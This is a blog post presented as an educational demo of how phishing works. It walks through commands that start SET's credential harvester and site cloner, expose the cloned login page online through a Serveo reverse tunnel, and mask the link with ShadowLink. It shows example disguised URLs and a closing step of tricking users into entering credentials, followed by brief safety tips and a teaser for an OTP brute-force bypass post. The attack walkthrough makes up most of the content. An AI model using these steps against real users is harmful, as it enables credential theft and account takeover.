How Phishing Attacks Actually Work: Real Demo Using SET Toolkit & ShadowLink For Education Only

-


Phishing is one of the most common attack vectors in cybercrime. In this post, we’ll walk through how phishing websites are created using:

  • Kali Linux (Ethical hacking OS)

  • SET Toolkit (Social Engineering Toolkit)

  • Serveo (Port forwarding to expose local host online)

  • ShadowLink (URL masking tool to make malicious links look legit)

You’ll see exactly how attackers can craft phishing pages, host them online, and disguise the links to look harmless — and you’ll learn how to detect and defend against it.


DISCLAIMER:
This guide is intended purely for educational and awareness purposes. The techniques shown are commonly used in cyber attacks, and this walkthrough is meant to help readers understand how phishing works so they can protect themselves.
Do not perform any of these techniques on real systems or without proper authorization. Cybersecurity education is about prevention — not exploitation.


Tools Used:

  • 🔹 Kali Linux

  • 🔹 SET Toolkit

  • 🔹 Serveo.net (SSH-based tunneling)

  • 🔹 ShadowLink (Cloak phishing URLs)

  • 🔹 Custom phishing page demo (GitHub hosted)


Terminal Commands Used in This Demo:

# Step 1: Update Kali Linux
sudo apt update && sudo apt upgrade -y

# Step 2: Start SET Toolkit
sudo setoolkit

# Choose the following path:
# 1) Social Engineering Attacks
# 2) Website Attack Vectors
# 3) Credential Harvester Attack Method
# 2) Site Cloner

# IP address to listen on: 192.168.0.103
# Website to clone: https://petherl.github.io/hacker-login-page/

# Step 3: Port Forwarding with Serveo
ssh -R 80:localhost:80 serveo.net

# Step 4: Clone ShadowLink
cd ~/Desktop
git clone https://github.com/petherl/shadowlink.git
cd shadowlink

# Step 5: Create Python environment and install requirements
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt

# Step 6: Launch ShadowLink
python3 shadowlink.py

Input example in ShadowLink:

  • Original URL: https://********************.serveo.net/

  • Domain disguise: *****.com

  • Keyword: login

Example disguised phishing links (demo only):

https://*****.com-login@**** 
http://*****.com-login@****



Understanding How Phishing Works (Step-by-Step):

  1. Clone the site using SET to replicate a legitimate-looking login form.

  2. Serve it on localhost using the built-in Apache server in Kali.

  3. Expose the local site to the internet via Serveo (port forwarding).

  4. Use ShadowLink to mask the URL with a believable domain.

  5. Trick users into clicking and entering credentials — which get logged.


How to Stay Safe from Phishing Attacks:

  • ✅ Always check the URL — especially what comes before the domain.

  • ✅ Don’t trust shortened or masked links unless you know the source.

  • ✅ Use 2FA (Two-Factor Authentication) on all your accounts.

  • ✅ Train yourself and others with regular security awareness practices.

  • ✅ Use password managers to avoid manually typing credentials.


Resources & Downloads:



Comments

Post a Comment

Popular posts from this blog

Email OTP Bypass Using Kali Linux, Burp Suite, and Temp Mail – Ethical Hacking Demonstration

-
Image
Explore how weak OTP implementations can be tested and bypassed in a legal, controlled environment using Kali Linux tools and Burp Suite. This educational guide is intended for ethical hackers and cybersecurity learners. In this blog post, I will walk you through a step-by-step demonstration of an Email OTP (One-Time Password) bypass , conducted purely for educational and ethical testing purposes . The entire process was performed in a controlled environment using legal and publicly available tools and test websites. The goal is to raise awareness about the importance of secure OTP implementations and how weak setups can be vulnerable to brute-force techniques. 🧰 Tools & Resources Used Operating System : Kali Linux Proxy Tool : Burp Suite Community Edition Temporary Email Provider : Temp Mail Test Environment : Expand Testing – OTP Login Page Terminal Commands : Crunch, touch, cat ⚙️ Methodology Accessed a Demo OTP Login Page Using the practice site at pra...
Read more

How to Format a USB Drive Using Windows CMD – Complete Step-by-Step Guide

-
Image
Format a USB Drive Using Windows CMD Want to format your USB drive using Command Prompt in Windows? This detailed guide walks you through each step, ensuring a smooth and error-free process. Follow along to clean, create, and format your USB drive using simple CMD commands. >> Steps Covered in This Guide: 1. Open Command Prompt with Admin Privileges Press Win + X , select Terminal (Admin) , and click Yes if prompted. 2. Start DiskPart Type the following command and press Enter: diskpart 3. List Available Drives To identify your USB drive, enter: list disk 4. Select the USB Drive Choose the correct USB drive (replace "X" with the drive number): select disk X 5. Clean the Drive Erase all data on the USB drive by typing: clean 6. Create a New Partition To create a primary partition, enter: create partition primary 7.  Format the USB Drive To format it with NTFS, type: format fs=ntfs quick For FAT32, use: format fs=fat32 quick 8. Assign a Drive Lett...
Read more